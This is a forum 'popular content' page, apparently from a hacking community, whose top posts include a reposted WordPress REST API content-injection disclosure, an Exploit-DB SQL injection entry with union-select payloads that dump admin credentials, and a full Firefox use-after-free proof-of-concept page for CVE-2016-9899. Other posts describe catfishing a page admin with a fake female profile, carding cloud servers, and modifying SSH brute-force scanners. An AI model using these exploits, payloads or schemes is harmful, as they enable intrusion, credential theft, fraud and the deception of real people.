Leaderboard

Popular Content

Showing content with the highest reputation on 02/10/17 in all areas

  1. Can't you see, you ox, that I wrote it above? It's against the rules. I said it so you'd think again. Permanent ban, you wanker.
    2 points
  2. 2 points
  3. 2 points
  4. Security Risk: Severe
     Exploitation Level: Easy/Remote
     DREAD Score: 9/10
     Vulnerability: Privilege Escalation / Content Injection
     Patched Version: 4.7.2

     As part of a vulnerability research project for our Sucuri Firewall (WAF), we have been auditing multiple open source projects looking for security issues. While working on WordPress, we discovered a severe content injection (privilege escalation) vulnerability affecting the REST API. This vulnerability allows an unauthenticated user to modify the content of any post or page within a WordPress site.

     We disclosed the vulnerability to the WordPress Security Team who handled it extremely well. They worked closely with us to coordinate the disclosure timeline and get as many hosts and security providers aware and patched before this became public. A fix for this was silently included on version 4.7.2 along with other less severe issues. This was done intentionally to give everyone time to patch. We are now disclosing the details because we feel there has been enough time for most WordPress users to update their sites.

     Are You At Risk?

     This privilege escalation vulnerability affects the WordPress REST API that was recently added and enabled by default on WordPress 4.7.0. One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site. The REST API is enabled by default on all sites using WordPress 4.7.0 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.

     Technical Details

     Our journey begins in ./wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php

     There are a couple of things to notice here. The registered route is designed to populate the ID request parameter with digits. For example, if you are sending a request to /wp-json/wp/v2/posts/1234 – the ID parameter would be set to 1234.

     This behavior alone could be a good way to prevent attackers from crafting malicious ID values, but when looking at how the REST API manages access, we quickly discover that it prioritizes $_GET and $_POST values over the ones generated by the route's regular expression. This makes it possible for an attacker to send a request like: /wp-json/wp/v2/posts/1234?id=12345helloworld – which would assign 12345helloworld to the ID parameter – which now contains more than just digits.

     Investigating further, we had a look at the various callbacks (in the screenshot above) and one of them kept our attention: the update_item and its permission check method update_item_permissions_check. In short, it passes our alphanumeric ID value directly to the get_post() function. This function validates the request by checking if the post actually exists and whether our user has permission to edit this post.

     We found this to be a curious way of sanitizing the request. If we send an ID that doesn't have a corresponding post, we can just pass through the permission check and be allowed to continue executing requests to the update_item method!

     Curious about what could cause get_post() to fail at finding a post (other than a non-existent ID), we realized it used the get_instance() static method in wp_posts to grab posts. As you can see from the code, it would basically fail on any input that isn't all made of numeric characters – so 123ABC would fail.

     For an attacker, this means that WordPress (thinking it's a user with enough privilege to edit this post) would run the update_item method. We thought it would make sense to check what this method does.

     There is a very subtle, yet important detail in that last screenshot – WordPress casts the ID parameter to an integer before passing it to get_post! This is an issue because of the way PHP does type comparisons and conversions.

     For example, one can see that the following snippet would return 123:

     This leads to a very dangerous situation where an attacker could submit a request like /wp-json/wp/v2/posts/123?id=456ABC to change the post whose ID is 456!

     Due to this type-juggling issue, it is then possible for an attacker to change the content of any post or page on a victim's site. From there, they can add plugin-specific shortcodes to exploit vulnerabilities (that would otherwise be restricted to contributor roles), infect the site content with an SEO spam campaign, or inject ads, etc. Depending on the plugins enabled on the site, even PHP code could be executed very easily.

     SOURCE: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
    1 point
  5. https://aws.amazon.com/free/ - Amazon EC2, 750 hours/month free. Send me a PM with the changes you want to make and a link from which I can download the programs.
    1 point
  6. You trap the admin. You make a girl account, but make it look as real as possible, a hottie, then you like a bunch of posts, then you message him saying how much you like his page, then you give a few more likes, then you message him that you like the page very much and you'd like admin/editor etc. because you want to help him with the page. He gives you admin and then you'll see who he is.... I'm tired
    1 point
  7. # # # # # #
     # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
     # Google Dork: N/A
     # Date: 07.02.2017
     # Vendor Homepage: http://nelliwinne.net/
     # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
     # Demo: http://demos.nelliwinne.net/MySqlFileUpload/
     # Version: 1.0
     # Tested on: Win7 x64, Kali Linux x64
     # # # # # #
     # Exploit Author: Ihsan Sencan
     # Author Web: http://ihsan.net
     # Author Mail : ihsan[@]ihsan[.]net
     # # # # # #
     # SQL Injection/Exploit :
     # http://localhost/[PATH]/download.php?id=[SQL]&t=files
     # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
     # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
     # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
     # Etc....Other files have vulnerabilities ...
     # # # # #
     Source: https://www.exploit-db.com/exploits/41267/
    1 point
  8. Use: You didn't have to tell us you're a hoodlum; the hair on my back stood up, sad. First of all, thuggery gets you nowhere; I don't know how it works over there where you are, I think aelius knows (I believe he lives around there). Go to school, get into a math/CS track or whatever courses they have over there, study and do the projects the teachers assign you, otherwise you'll end up wiping some stinking German's arse (that is, if you're a kid, which I think you are). And if you're not a kid, and regarding your story that you work there, well, we start again from the point that you're a hoodlum, and if you were a hoodlum in your youth too and didn't use your head, it's pretty hard to get it going to learn something in this field; I'm not saying it can't be done, but it takes desire and will; you can all curse me, I don't mind). I, for one, pray for you that you didn't lie to us about your age; there's still a chance for you to build a "cool" future. Good luck.
    1 point
  9. <!DOCTYPE html>
     <html>
     <head>
     <!-- <meta http-equiv="refresh" content="1"/> -->
     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
     <meta http-equiv="Expires" content="0" />
     <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
     <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
     <meta http-equiv="Pragma" content="no-cache" />
     <style type="text/css">
     body{
       background-color:lime;
       font-color:red;
     };
     </style>
     <script type='text/javascript'></script>
     <script type="text/javascript" language="JavaScript">
     /*
      * Mozilla Firefox < 50.1.0 Use-After-Free POC
      * Author: Marcin Ressel
      * Date: 13.01.2017
      * Vendor Homepage: www.mozilla.org
      * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
      * Version: < 50.1.0
      * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
      * CVE: CVE-2016-9899
      *************************************************
      * (b1c.5e0): Access violation - code c0000005 (first chance)
      * First chance exceptions are reported before any exception handling.
      * This exception may be expected and handled.
      *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
      * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
      * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
      * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
      * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
      * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
      * 0:000> dd eax
      * 0f804c00  4543484f 91919191 91919191 91919191
      * 0f804c10  91919191 91919191 91919191 91919191
      * 0f804c20  91919191 91919191 91919191 91919191
      * 0f804c30  91919191 91919191 91919191 91919191
      * 0f804c40  91919191 91919191 91919191 91919191
      * 0f804c50  91919191 91919191 91919191 91919191
      * 0f804c60  91919191 91919191 91919191 91919191
      * 0f804c70  91919191 91919191 91919191 91919191
      */
     var doc = null;
     var cnt = 0;

     function m(blocks,size) {
       var arr = [];
       for(var i=0;i<blocks;i++) {
         arr[i] = new Array(size);
         for(var j=0;j<size;j+=2) {
           arr[i][j] = 0x41414141;
           arr[i][j+1] = 0x42424242;
         }
       }
       return arr;
     }

     function handler() { //free
       if(cnt > 0) return;
       doc.body.appendChild(document.createElement("audio")).remove();
       m(1024,1024);
       ++cnt;
     }

     function trigger() {
       if(cnt > 0) {
         var pl = new Array();
         doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);
         for(var i=0;i<4096;i++) { //replace
           pl[i]=new Uint8Array(1000);
           pl[i][0] = 0x4F;
           pl[i][1] = 0x48;
           pl[i][2] = 0x43;
           pl[i][3] = 0x45; //eip
           for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;
           // pl[i] = document.createElement('media');
           //document.body.appendChild(pl[i]);
         }
         window.pl = pl;
         document.getElementById("t1").remove(); //re-use
       }
     }

     function testcase() {
       var df = m(4096,1000);
       document.body.setAttribute('df',df);
       doc = document.getElementById("t1").contentWindow.document;
       doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);
       doc.getElementsByTagName("*")[0].style = "ANNNY";
       setInterval("trigger();",1000);
     }
     </script>
     <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
     </head>
     <body onload='testcase();'>
     <iframe src='about:blank' id='t1' width="100%"></iframe>
     </body>
     </html>
     Source: https://www.exploit-db.com/exploits/41042/
    1 point
  10. You can find it for free online... if I push myself I'll post it, but I'm too lazy to look for where I downloaded it.
    1 point
  11. Bro, the Amazon root isn't free unless you card it. I don't know.. I'll give whatever I still have too.
    -1 points
  12. Do you know that pscan2 and sshd from bruteforce? The scan archive, more precisely the mix.. Can someone make the time and help me modify them? I'll give an Amazon VPS to whoever can help me..
    -2 points